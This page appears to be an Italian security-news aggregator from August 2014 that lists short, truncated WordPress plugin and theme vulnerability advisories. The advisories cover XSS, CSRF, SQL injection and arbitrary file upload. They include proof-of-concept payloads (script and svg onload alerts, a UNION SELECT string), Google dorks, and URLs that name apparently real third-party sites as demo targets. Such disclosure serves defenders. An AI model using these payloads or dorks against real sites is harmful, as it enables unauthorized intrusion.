WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

WordPress 2.77 CSRF

17 agosto 2014 - Fonte: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP 
database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get 
it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/

(5)

...

Leggi il seguito »

WordPress MyBand Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Leggi il seguito »

WordPress Gamespeed Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Leggi il seguito »

WordPress SI CAPTCHA Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross  
site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork:  
inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Leggi il seguito »

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WPSS 0.62 Cross Site Scripting

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Leggi il seguito »

WordPress WPSS 0.62 SQL Injection

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Leggi il seguito »

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 agosto 2014 - Fonte: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 de Julio del 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Archivos Afectados.
 
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS
CODE]
 
Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>
 
Variable Afectada: $idx
Fix:...

Leggi il seguito »